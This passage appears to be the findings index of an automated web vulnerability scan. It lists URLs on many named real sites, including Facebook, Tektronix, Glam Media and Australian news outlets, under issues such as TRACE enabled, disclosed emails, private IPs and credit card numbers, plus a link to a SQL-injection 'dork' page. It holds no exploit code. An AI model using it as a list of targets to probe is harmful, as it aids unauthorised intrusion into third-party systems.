23.195. http://www.tek.com/Measurement/cgi-bin/live-quote.cgi

23.196. http://www.tek.com/applications/computing.html

23.197. http://www.tek.com/home/products.html

23.198. http://www.tek.com/products/logic-analyzer/

23.199. http://www.tek.com/products/logic-analyzer/tla6000/

23.200. http://www.theage.com.au/action/printArticle

23.201. http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

23.202. http://www.theaustralian.com.au/news/detention-protests-spread-across-country/story-e6frg6n6-1226044228620

23.203. http://www.theaustralian.com.au/news/nation/abbott-a-hero-on-troubled-christmas-island/story-e6frg6nf-1226045245809

23.204. http://www.theaustralian.com.au/news/nation/third-asylum-seeker-boat-this-month-off-christmas-island/story-e6frg6nf-1226040623081

23.205. http://www.thefashionablegal.com/

23.206. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

23.207. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

23.208. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.209. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.210. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.211. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.212. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.213. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.214. http://www.thefashionablegal.com/wp-login.php

23.215. http://www.thefashionablehousewife.com/wp-login.php

23.216. http://www.thesunchronicle.com/

23.217. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

23.218. http://www.thesunchronicle.com/rehoboth/real_estate/

23.219. http://www.topcareerschools.com/s/279-390/12823153/

23.220. http://www.truelocal.com.au/

23.221. http://www.twisted-silver.com/

23.222. http://www.watoday.com.au/action/printArticle

23.223. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

23.224. http://www.watoday.com.au/wa-news/perth-asylum-seekers-threaten-hanging-20110418-1dkp1.html

23.225. http://www.webhostingtalk.com/showthread.php

23.226. http://www.webmgr8.com/index.cfm

23.227. http://www.wiseshop.com/contact.html

23.228. http://www.wiseshop.com/shop.php

23.229. http://www.wiseshop.com/sign_up.html

23.230. http://www.xinhuanet.com/english2010/odd/index.htm

23.231. http://www.youtube.com/results

23.232. http://www2.idexpertscorp.com/

23.233. http://www2.idexpertscorp.com/blog/

23.234. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

23.235. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

23.236. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

23.237. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

23.238. http://www2.idexpertscorp.com/contact/

23.239. http://www2.idexpertscorp.com/page-not-found/

23.240. http://www2.tek.com/cmswpt/prfinder.lotr

23.241. http://www2.tek.com/price/tk_ec_pricepage.msrp

23.242. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

24. File upload functionality

25. TRACE method is enabled

25.1. http://a.dlqm.net/

25.2. http://ad.linksynergy.com/

25.3. http://ads.specificmedia.com/

25.4. http://arts.onbloglist.com/

25.5. https://auth.tek.com/

25.6. http://cache.daylife.com/

25.7. http://cache.specificmedia.com/

25.8. http://cheetah.vizu.com/

25.9. http://dlx.specificclick.net/

25.10. http://feeds.glam.com/

25.11. http://glam.grapeshot.co.uk/

25.12. http://image2.pubmatic.com/

25.13. http://lp.idexpertscorp.com/

25.14. http://mm.chitika.net/

25.15. http://news.xinhuanet.com/

25.16. http://optimized-by.rubiconproject.com/

25.17. http://puma.vizu.com/

25.18. http://r.openx.net/

25.19. http://rd.apmebf.com/

25.20. http://secure-au.imrworldwide.com/

25.21. http://twittercounter.com/

25.22. http://widget.linkwithin.com/

25.23. http://widget2.linkwithin.com/

25.24. http://www.giveawayscout.com/

25.25. http://www.glam.de/

25.26. http://www.glam.jp/

25.27. http://www.glamadapt.com/

25.28. http://www.guardian.co.uk/

25.29. http://www.hipaa-101.com/

25.30. http://www.hipaastore.com/

25.31. https://www.hipaastore.com/

25.32. http://www.isecauditors.com/

25.33. http://www.orgsites.com/

25.34. https://www.placemyad.com.au/

25.35. http://www.shadowtrack.com/

25.36. http://www.stumbleupon.com/

25.37. http://www.stylemepretty.com/

25.38. http://www.tek.com/

25.39. http://www.thehousehuntershandbook.com/

25.40. http://www.topcareerschools.com/

25.41. http://www.trizetto.com/

25.42. http://www30a2-orig.glam.com/

25.43. http://xads.zedo.com/

25.44. http://yads.zedo.com/

26. Email addresses disclosed

26.1. http://a.ads1.msads.net/ads/1/0000000001_000000000000000151527.gif

26.2. http://ads.adbrite.com/adserver/behavioral-data/8201

26.3. http://ads.adbrite.com/adserver/behavioral-data/8204

26.4. http://ads.adbrite.com/adserver/vdi/682865

26.5. http://ads.adbrite.com/adserver/vdi/682865

26.6. http://ads.adbrite.com/adserver/vdi/682865

26.7. http://ads.adbrite.com/adserver/vdi/682865

26.8. http://ads.adbrite.com/adserver/vdi/682865

26.9. http://ads.adbrite.com/adserver/vdi/712156

26.10. http://ads.adbrite.com/adserver/vdi/742697

26.11. http://ads.adbrite.com/adserver/vdi/753292

26.12. http://ads.adbrite.com/adserver/vdi/779045

26.13. http://ads.adbrite.com/adserver/vdi/779045

26.14. http://ads.adbrite.com/adserver/vdi/779045

26.15. http://ads.adbrite.com/adserver/vdi/810647

26.16. http://ads.adbrite.com/adserver/vdi/810647

26.17. http://ads.adbrite.com/adserver/vdi/810647

26.18. http://ads.adbrite.com/adserver/vdi/830697

26.19. http://ads.adbrite.com/adserver/vdi/830697

26.20. http://ads1.msads.net/ads/1/0000000001_000000000000000151527.gif

26.21. http://ads2.adbrite.com/v0/ad

26.22. http://ads2.adbrite.com/v0/ad

26.23. http://ads2.adbrite.com/v0/ad

26.24. http://ads2.adbrite.com/v0/ad

26.25. http://ads2.adbrite.com/v0/ad

26.26. http://ads2.adbrite.com/v0/ad

26.27. http://ads2.adbrite.com/v0/ad

26.28. http://ads2.adbrite.com/v0/ad

26.29. http://ads2.adbrite.com/v0/ad

26.30. http://ads2.adbrite.com/v0/ad

26.31. http://ads2.adbrite.com/v0/ad

26.32. http://ads2.adbrite.com/v0/ad

26.33. http://ads2.adbrite.com/v0/ad

26.34. http://ads2.adbrite.com/v0/ad

26.35. http://ads2.adbrite.com/v0/ad

26.36. http://ads2.adbrite.com/v0/ad

26.37. http://ads2.adbrite.com/v0/ad

26.38. http://api.trulia.com/getListings.php

26.39. https://auth.tek.com/mytek/faces/scripts/webservice.js

26.40. https://clientcommunity.touchnet.com/web/login.action

26.41. https://clientcommunity.touchnet.com/web/s/2042/1452/1.2.2/_/download/batch/com.atlassian.confluence.plugins.doctheme:splitter/com.atlassian.confluence.plugins.doctheme:splitter.js

26.42. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

26.43. http://idexperts.wufoo.com/scripts/public/dynamic.14565.js

26.44. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/334b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

26.45. http://media.islandpacket.com/scripts/jquery.hoverIntent.minified.js

26.46. http://mediacdn.disqus.com/1304107721/build/system/disqus.js

26.47. http://news.9REDACTED.com.au/js/top_combined.js

26.48. http://news.xinhuanet.com/english2010/world/2011-05/02/c_13855230.htm

26.49. http://resources.brisbanetimes.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.brisbanetimes_min.js

26.50. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.smh_min.js

26.51. http://resources.theage.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.theage_min.js

26.52. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.watoday_min.js

26.53. http://resources1.news.com.au/cs/js/base-modules-min.js

26.54. http://shared.9REDACTED.com.au/share/com/js/nineREDACTED.ysmgenerator.js

26.55. http://shared.9REDACTED.com.au/share/com/js/survey.js

26.56. http://static.guim.co.uk/static/104228/common/external-scripts/jquery-libraries/jquery.cookie.js

26.57. http://static.playtexbramakeover.com/assets/js/swfIN.js

26.58. https://tracker.i-structure.com/

26.59. http://w.sharethis.com/button/buttons.js

26.60. http://widgets.twimg.com/j/2/widget.js

26.61. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

26.62. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

26.63. http://www.glam.com/topic/

26.64. http://www.glam.com/videos/

26.65. http://www.glammedia.com/about_glam/legal/copyright_policy.php

26.66. http://www.glammedia.com/about_glam/legal/optout.php

26.67. http://www.glammedia.com/about_glam/legal/privacy.php

26.68. http://www.glammedia.com/about_glam/legal/privacyandsecuritypolicy-previousversion9-12-2007.php

26.69. http://www.glammedia.com/about_glam/legal/terms_of_use.php

26.70. http://www.glammedia.com/about_glam/news/in_the_news.php

26.71. http://www.glammedia.com/about_glam/news/press_room.php

26.72. http://www.glammedia.com/about_glam/our_people/management.php

26.73. http://www.glammedia.com/about_glam/our_properties/bliss.php

26.74. http://www.glammedia.com/about_glam/our_properties/brash.php

26.75. http://www.glammedia.com/about_glam/our_properties/glam_owned_and_operated_sites.php

26.76. http://www.glammedia.com/about_glam/our_properties/glamsocial.php

26.77. http://www.glammedia.com/about_glam/our_properties/glamtv.php

26.78. http://www.glammedia.com/about_glam/our_properties/subscribe_rss.php

26.79. http://www.glammedia.com/about_glam/our_properties/tinker.php

26.80. http://www.glammedia.com/about_glam/our_story/index.php

26.81. http://www.glammedia.com/about_glam/our_story/our_story.php

26.82. http://www.glammedia.com/advertisers/

26.83. http://www.glammedia.com/advertisers/adaptive.php

26.84. http://www.glammedia.com/advertisers/audience.php

26.85. http://www.glammedia.com/advertisers/capabilities.php

26.86. http://www.glammedia.com/advertisers/index.php

26.87. http://www.glammedia.com/advertisers/specifications/index.php

26.88. http://www.glammedia.com/advertisers/submit_rfp.php

26.89. http://www.glammedia.com/advertisers/targeting.php

26.90. http://www.glammedia.com/contact_us/

26.91. http://www.glammedia.com/contact_us/contact_us.php

26.92. http://www.glammedia.com/contact_us/index.php

26.93. http://www.glammedia.com/contact_us/jobs/index.php

26.94. http://www.glammedia.com/contact_us/location/index.php

26.95. http://www.glammedia.com/international/

26.96. http://www.glammedia.com/publishers/glam_publisher_network/

26.97. http://www.glammedia.com/publishers/glam_publisher_network/apply_now.php

26.98. http://www.glammedia.com/publishers/glam_publisher_network/index.php

26.99. http://www.glammedia.com/publishers/glam_publisher_network/site_requirements.php

26.100. http://www.glammedia.com/publishers/glam_publisher_network/why_join_the_network.php

26.101. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

26.102. http://www.hipaasolutions.org/

26.103. http://www.hipaasolutions.org/about_us.htm

26.104. https://www.idexpertscorp.com/RADAR/

26.105. https://www.idexpertscorp.com/dbhc/

26.106. https://www.idexpertscorp.com/js/events.js

26.107. http://www.infocrossing.com/includes/js/jquery.dimensions.pack.js

26.108. http://www.inspiredelearning.com/Controls/Drop_down-2008.js

26.109. http://www.inspiredelearning.com/inspired/request.info.htm

26.110. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

26.111. http://www.logrhythm.com/

26.112. http://www.logrhythm.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

26.113. http://www.logrhythm.com/Resources/Shared/scripts/widgets.js

26.114. http://www.logrhythm.com/controls/SolpartMenu/spmenu.js

26.115. http://www.orbitcast.com/contact/

26.116. http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903

26.117. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

26.118. http://www.perthnow.com.au/news/western-australia/two-asylum-seekers-attempt-suicide-at-airport-detention-centre/story-e6frg13u-1226040848142

26.119. http://www.righthealth.com/topic/What_Is_Hipaa

26.120. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

26.121. http://www.strausnews.com/StrausCommunityGuide2010/includes/communityguide.css

26.122. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

26.123. http://www.strausnews.com/local_farmers/includes/farmers.css

26.124. http://www.tek.com/

26.125. http://www.thefashionablegal.com/

26.126. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

26.127. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

26.128. http://www.thehousehuntershandbook.com/public/listingSingle.do

26.129. http://www.thesunchronicle.com/

26.130. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

26.131. http://www.thesunchronicle.com/rehoboth/real_estate/

26.132. http://www.touchnet.com/web/s/2042/1452/1.2.2/_/download/batch/com.atlassian.confluence.plugins.doctheme:splitter/com.atlassian.confluence.plugins.doctheme:splitter.js

26.133. http://www.trizetto.com/company/contactUs.asp

26.134. http://www.watoday.com.au/action/printArticle

26.135. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

26.136. http://www.watoday.com.au/wa-news/perth-asylum-seekers-threaten-hanging-20110418-1dkp1.html

26.137. http://www.webhostingtalk.com/showthread.php

26.138. http://www.wiseshop.com/compactor.cjs

26.139. http://www.xinhuanet.com/english2010/static/top_xilan.htm

26.140. http://www2.idexpertscorp.com/

26.141. http://www2.idexpertscorp.com/blog/

26.142. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

26.143. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

26.144. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

26.145. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

26.146. http://www2.idexpertscorp.com/contact/

26.147. http://www2.idexpertscorp.com/js/hoverintent.js

26.148. http://www2.idexpertscorp.com/js/innerfade.js

26.149. http://www2.idexpertscorp.com/page-not-found/

26.150. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

27. Private IP addresses disclosed

27.1. http://api.facebook.com/restserver.php

27.2. http://api.facebook.com/restserver.php

27.3. http://check4.connect.facebook.com/ajax/v6.php

27.4. http://check4.connect.facebook.com/ajax/v6.php

27.5. http://check4.facebook.com/ajax/v6.php

27.6. http://check4.facebook.com/ajax/v6.php

27.7. http://check4.facebook.com/ajax/v6.php

27.8. http://check4.facebook.com/ajax/v6.php

27.9. http://check4.facebook.com/ajax/v6.php

27.10. http://check4.facebook.com/ajax/v6.php

27.11. http://check4.facebook.com/ajax/v6.php

27.12. http://check4.facebook.com/ajax/v6.php

27.13. http://check4.facebook.com/ajax/v6.php

27.14. http://check4.facebook.com/ajax/v6.php

27.15. http://check4.facebook.com/ajax/v6.php

27.16. http://check4.facebook.com/ajax/v6.php

27.17. http://check4.facebook.com/ajax/v6.php

27.18. http://check4.facebook.com/ajax/v6.php

27.19. http://check4.facebook.com/ajax/v6.php

27.20. http://check4.facebook.com/ajax/v6.php

27.21. http://check4.facebook.com/ajax/v6.php

27.22. http://check4.facebook.com/ajax/v6.php

27.23. http://check4.facebook.com/ajax/v6.php

27.24. http://check4.facebook.com/ajax/v6.php

27.25. http://check4.facebook.com/ajax/v6.php

27.26. http://check4.facebook.com/ajax/v6.php

27.27. http://check4.facebook.com/ajax/v6.php

27.28. http://check4.facebook.com/ajax/v6.php

27.29. http://check4.facebook.com/ajax/v6.php

27.30. http://check4.facebook.com/ajax/v6.php

27.31. http://check4.facebook.com/ajax/v6.php

27.32. http://check4.facebook.com/ajax/v6.php

27.33. http://check4.facebook.com/ajax/v6.php

27.34. http://check4.facebook.com/ajax/v6.php

27.35. http://check4.facebook.com/ajax/v6.php

27.36. http://check4.facebook.com/ajax/v6.php

27.37. http://check6.connect.facebook.com/ajax/v6.php

27.38. http://check6.connect.facebook.com/ajax/v6.php

27.39. http://check6.facebook.com/ajax/v6.php

27.40. http://check6.facebook.com/ajax/v6.php

27.41. http://check6.facebook.com/ajax/v6.php

27.42. http://check6.facebook.com/ajax/v6.php

27.43. http://check6.facebook.com/ajax/v6.php

27.44. http://check6.facebook.com/ajax/v6.php

27.45. http://check6.facebook.com/ajax/v6.php

27.46. http://check6.facebook.com/ajax/v6.php

27.47. http://check6.facebook.com/ajax/v6.php

27.48. http://check6.facebook.com/ajax/v6.php

27.49. http://check6.facebook.com/ajax/v6.php

27.50. http://check6.facebook.com/ajax/v6.php

27.51. http://check6.facebook.com/ajax/v6.php

27.52. http://check6.facebook.com/ajax/v6.php

27.53. http://check6.facebook.com/ajax/v6.php

27.54. http://check6.facebook.com/ajax/v6.php

27.55. http://check6.facebook.com/ajax/v6.php

27.56. http://check6.facebook.com/ajax/v6.php

27.57. http://check6.facebook.com/ajax/v6.php

27.58. http://check6.facebook.com/ajax/v6.php

27.59. http://check6.facebook.com/ajax/v6.php

27.60. http://check6.facebook.com/ajax/v6.php

27.61. http://check6.facebook.com/ajax/v6.php

27.62. http://check6.facebook.com/ajax/v6.php

27.63. http://check6.facebook.com/ajax/v6.php

27.64. http://check6.facebook.com/ajax/v6.php

27.65. http://check6.facebook.com/ajax/v6.php

27.66. http://check6.facebook.com/ajax/v6.php

27.67. http://check6.facebook.com/ajax/v6.php

27.68. http://check6.facebook.com/ajax/v6.php

27.69. http://check6.facebook.com/ajax/v6.php

27.70. http://check6.facebook.com/ajax/v6.php

27.71. http://connect.facebook.net/en_US/all.js

27.72. http://delb.opt.fimserve.com/adopt/

27.73. http://delb.opt.fimserve.com/adopt/

27.74. http://demr.opt.fimserve.com/adopt/

27.75. http://desb.opt.fimserve.com/adopt/

27.76. http://media.dailytelegraph.com.au/fe/2011/mar/gallerybook/jquery-galleryBook.js

27.77. http://static.ak.connect.facebook.com/images/connect_sprite.png

27.78. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

27.79. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

27.80. http://static.ak.fbcdn.net/connect.php/js/FB.Share

27.81. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.82. http://static.ak.fbcdn.net/images/connect_sprite.png

27.83. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/uerQhlzUjfV.js

27.84. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/8bLZwyyAK4a.js

27.85. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css

27.86. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

27.87. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/zZEOQP4uOC1.gif

27.88. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

27.89. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

27.90. http://www.blogcatalog.com/images/buttons/blogcatalog5.gif

27.91. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

27.92. http://www.connect.facebook.com/common/scribe_endpoint.php

27.93. http://www.connect.facebook.com/common/scribe_endpoint.php

27.94. http://www.connect.facebook.com/widgets/fan.php

27.95. http://www.connect.facebook.com/widgets/fan.php

27.96. http://www.facebook.com/common/scribe_endpoint.php

27.97. http://www.facebook.com/common/scribe_endpoint.php

27.98. http://www.facebook.com/common/scribe_endpoint.php

27.99. http://www.facebook.com/common/scribe_endpoint.php

27.100. http://www.facebook.com/common/scribe_endpoint.php

27.101. http://www.facebook.com/common/scribe_endpoint.php

27.102. http://www.facebook.com/common/scribe_endpoint.php

27.103. http://www.facebook.com/common/scribe_endpoint.php

27.104. http://www.facebook.com/common/scribe_endpoint.php

27.105. http://www.facebook.com/common/scribe_endpoint.php

27.106. http://www.facebook.com/common/scribe_endpoint.php

27.107. http://www.facebook.com/common/scribe_endpoint.php

27.108. http://www.facebook.com/common/scribe_endpoint.php

27.109. http://www.facebook.com/common/scribe_endpoint.php

27.110. http://www.facebook.com/common/scribe_endpoint.php

27.111. http://www.facebook.com/common/scribe_endpoint.php

27.112. http://www.facebook.com/common/scribe_endpoint.php

27.113. http://www.facebook.com/common/scribe_endpoint.php

27.114. http://www.facebook.com/common/scribe_endpoint.php

27.115. http://www.facebook.com/common/scribe_endpoint.php

27.116. http://www.facebook.com/common/scribe_endpoint.php

27.117. http://www.facebook.com/common/scribe_endpoint.php

27.118. http://www.facebook.com/common/scribe_endpoint.php

27.119. http://www.facebook.com/common/scribe_endpoint.php

27.120. http://www.facebook.com/common/scribe_endpoint.php

27.121. http://www.facebook.com/common/scribe_endpoint.php

27.122. http://www.facebook.com/common/scribe_endpoint.php

27.123. http://www.facebook.com/common/scribe_endpoint.php

27.124. http://www.facebook.com/common/scribe_endpoint.php

27.125. http://www.facebook.com/common/scribe_endpoint.php

27.126. http://www.facebook.com/common/scribe_endpoint.php

27.127. http://www.facebook.com/common/scribe_endpoint.php

27.128. http://www.facebook.com/common/scribe_endpoint.php

27.129. http://www.facebook.com/common/scribe_endpoint.php

27.130. http://www.facebook.com/common/scribe_endpoint.php

27.131. http://www.facebook.com/common/scribe_endpoint.php

27.132. http://www.facebook.com/common/scribe_endpoint.php

27.133. http://www.facebook.com/common/scribe_endpoint.php

27.134. http://www.facebook.com/common/scribe_endpoint.php

27.135. http://www.facebook.com/common/scribe_endpoint.php

27.136. http://www.facebook.com/common/scribe_endpoint.php

27.137. http://www.facebook.com/common/scribe_endpoint.php

27.138. http://www.facebook.com/extern/login_status.php

27.139. http://www.facebook.com/extern/login_status.php

27.140. http://www.facebook.com/extern/login_status.php

27.141. http://www.facebook.com/extern/login_status.php

27.142. http://www.facebook.com/extern/login_status.php

27.143. http://www.facebook.com/extern/login_status.php

27.144. http://www.facebook.com/extern/login_status.php

27.145. http://www.facebook.com/extern/login_status.php

27.146. http://www.facebook.com/extern/login_status.php

27.147. http://www.facebook.com/extern/login_status.php

27.148. http://www.facebook.com/extern/login_status.php

27.149. http://www.facebook.com/extern/login_status.php

27.150. http://www.facebook.com/extern/login_status.php

27.151. http://www.facebook.com/extern/login_status.php

27.152. http://www.facebook.com/extern/login_status.php

27.153. http://www.facebook.com/extern/login_status.php

27.154. http://www.facebook.com/extern/login_status.php

27.155. http://www.facebook.com/home.php

27.156. http://www.facebook.com/home.php

27.157. http://www.facebook.com/plugins/activity.php

27.158. http://www.facebook.com/plugins/activity.php

27.159. http://www.facebook.com/plugins/activity.php

27.160. http://www.facebook.com/plugins/activity.php

27.161. http://www.facebook.com/plugins/activity.php

27.162. http://www.facebook.com/plugins/activity.php

27.163. http://www.facebook.com/plugins/activity.php

27.164. http://www.facebook.com/plugins/activity.php

27.165. http://www.facebook.com/plugins/facepile.php

27.166. http://www.facebook.com/plugins/like.php

27.167. http://www.facebook.com/plugins/like.php

27.168. http://www.facebook.com/plugins/like.php

27.169. http://www.facebook.com/plugins/like.php

27.170. http://www.facebook.com/plugins/like.php

27.171. http://www.facebook.com/plugins/like.php

27.172. http://www.facebook.com/plugins/like.php

27.173. http://www.facebook.com/plugins/like.php

27.174. http://www.facebook.com/plugins/like.php

27.175. http://www.facebook.com/plugins/like.php

27.176. http://www.facebook.com/plugins/like.php

27.177. http://www.facebook.com/plugins/like.php

27.178. http://www.facebook.com/plugins/like.php

27.179. http://www.facebook.com/plugins/like.php

27.180. http://www.facebook.com/plugins/like.php

27.181. http://www.facebook.com/plugins/like.php

27.182. http://www.facebook.com/plugins/like.php

27.183. http://www.facebook.com/plugins/like.php

27.184. http://www.facebook.com/plugins/like.php

27.185. http://www.facebook.com/plugins/like.php

27.186. http://www.facebook.com/plugins/like.php

27.187. http://www.facebook.com/plugins/like.php

27.188. http://www.facebook.com/plugins/like.php

27.189. http://www.facebook.com/plugins/like.php

27.190. http://www.facebook.com/plugins/like.php

27.191. http://www.facebook.com/plugins/likebox.php

27.192. http://www.facebook.com/plugins/likebox.php

27.193. http://www.facebook.com/plugins/likebox.php

27.194. http://www.facebook.com/plugins/likebox.php

27.195. http://www.facebook.com/plugins/likebox.php

27.196. http://www.facebook.com/plugins/likebox.php

27.197. http://www.facebook.com/plugins/likebox.php

27.198. http://www.facebook.com/plugins/likebox.php

27.199. http://www.facebook.com/plugins/recommendations.php

27.200. http://www.facebook.com/plugins/recommendations.php

27.201. http://www.glam.com/logincheck.php

27.202. http://www.google.com/sdch/rU20-FBA.dct

27.203. http://www.realestate.com.au/

27.204. http://www.weichert.com/search/realestate/PropertyListing.aspx

27.205. http://www.wiseshop.com/shop.php

27.206. http://www35.glam.com/gad/glamadapt_jsrv.act

27.207. http://www35.glam.com/gad/glamadapt_jsrv.act

27.208. http://www35.glam.com/gad/glamadapt_jsrv.act

27.209. http://www35.glam.com/gad/glamadapt_jsrv.act

27.210. http://www35.glam.com/gad/glamadapt_jsrv.act

27.211. http://www35.glam.com/gad/glamadapt_jsrv.act

27.212. http://www35.glam.com/gad/glamadapt_jsrv.act

27.213. http://www35.glam.com/gad/glamadapt_jsrv.act

27.214. http://www35.glam.com/gad/glamadapt_jsrv.act

27.215. http://www35.glam.com/gad/glamadapt_jsrv.act

27.216. http://www35.glam.com/gad/glamadapt_jsrv.act

27.217. http://www35.glam.com/gad/glamadapt_jsrv.act

27.218. http://www35.glam.com/gad/glamadapt_jsrv.act

27.219. http://www35.glam.com/gad/glamadapt_jsrv.act

27.220. http://www35.glam.com/gad/glamadapt_jsrv.act

27.221. http://www35.glam.com/gad/glamadapt_jsrv.act

27.222. http://www35.glam.com/gad/glamadapt_jsrv.act

27.223. http://www35.glam.com/gad/glamadapt_jsrv.act

27.224. http://www35.glam.com/gad/glamadapt_jsrv.act

27.225. http://www35.glam.com/gad/glamadapt_jsrv.act

27.226. http://www35.glam.com/gad/glamadapt_jsrv.act

27.227. http://www35.glam.com/gad/glamadapt_jsrv.act

27.228. http://www35.glam.com/gad/glamadapt_jsrv.act

27.229. http://www35.glam.com/gad/glamadapt_jsrv.act

27.230. http://www35.glam.com/gad/glamadapt_jsrv.act

27.231. http://www35.glam.com/gad/glamadapt_jsrv.act

27.232. http://www35.glam.com/gad/glamadapt_jsrv.act

27.233. http://www35.glam.com/gad/glamadapt_jsrv.act

27.234. http://www35.glam.com/gad/glamadapt_jsrv.act

27.235. http://www35.glam.com/gad/glamadapt_jsrv.act

27.236. http://www35.glam.com/gad/glamadapt_jsrv.act

27.237. http://www35.glam.com/gad/glamadapt_jsrv.act

27.238. http://www35.glam.com/gad/glamadapt_jsrv.act

28. Credit card numbers disclosed

28.1. http://www.bing.com/search

28.2. http://www.businessspectator.com.au/bs.nsf/fmJobListings

28.3. http://www35.glam.com/gad/glamadapt_jsrv.act

29. Robots.txt file

29.1. http://0.gravatar.com/avatar/61d13e4c2715fc6728b56bf8031ea151

29.2. http://0.r.REDACTED.com/

29.3. http://050-uwt-888.mktoresp.com/webevents/visitWebPage

29.4. http://1.gravatar.com/avatar/b530ef61ccf43de890b51db56fe3b417

29.5. http://1077745.r.REDACTED.com/

29.6. http://198.136.211.12/

29.7. http://4qinvite.4q.iperceptions.com/1.aspx

29.8. http://595221.r.REDACTED.com/

29.9. http://656900.r.REDACTED.com/

29.10. http://954370.r.REDACTED.com/

29.11. http://a.dlqm.net/adscgen/log_ut_err.php

29.12. http://a1.bing4.com/imagenewsfetcher.aspx

29.13. http://a2.bing4.com/imagenewsfetcher.aspx

29.14. http://a3.bing4.com/imagenewsfetcher.aspx

29.15. http://ad-apac.doubleclick.net/adj/onl.age.news/national

29.16. http://ad.amgdgt.com/ads/

29.17. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

29.18. http://ad.linksynergy.com/fs-bin/show

29.19. http://ads.pointroll.com/PortalServe/

29.20. http://ads.specificmedia.com/serve/v=5

29.21. http://adx.g.doubleclick.net/pagead/adview

29.22. http://adx.hwtm.com/www/delivery/spcjs.php

29.23. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

29.24. http://api.bing.net/json.aspx

29.25. http://api.recaptcha.net/challenge

29.26. http://api.shopstyle.com/crossdomain.xml

29.27. http://api.twitter.com/1/statuses/user_timeline.json

29.28. http://arts.onbloglist.com/img12.php

29.29. http://au.myspace.com/

29.30. https://auth.tek.com/mytek/faces/loginregistration.jsp

29.31. http://b1.adbrite.com/mb/banner_shim.swf

29.32. http://beauty.glam.com/

29.33. http://c.brightcove.com/services/viewer/federated_f9

29.34. http://cache.specificmedia.com/creative/blank.gif

29.35. http://cdn.hostessblog.com/wp-includes/js/l10n.js

29.36. http://celebrities.glam.com/

29.37. http://check4.connect.facebook.com/ajax/v6.php

29.38. http://check4.facebook.com/ajax/v6.php

29.39. http://check6.connect.facebook.com/ajax/v6.php

29.40. http://check6.facebook.com/ajax/v6.php

29.41. http://cheetah.vizu.com/a.gif

29.42. http://clickserve.cc-dt.com/link/tplimage

29.43. https://clientcommunity.touchnet.com/web/dashboard.action

29.44. http://clk.pointroll.com/bc/

29.45. http://cx.trizetto.com/

29.46. http://delb.opt.fimserve.com/adopt/

29.47. http://demr.opt.fimserve.com/adopt/

29.48. http://desb.opt.fimserve.com/adopt/

29.49. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/

29.50. http://development.logrhythm.com/Portals/0/logrhythm_home_page.swf

29.51. http://e-sites2.tek.com/mytek/faces/startresource.jsp

29.52. http://enjmp.com/links/

29.53. http://entertainment.glam.com/

29.54. http://ev.ads.pointroll.com/event/

29.55. http://ev.ib-ibi.com/image.sbix

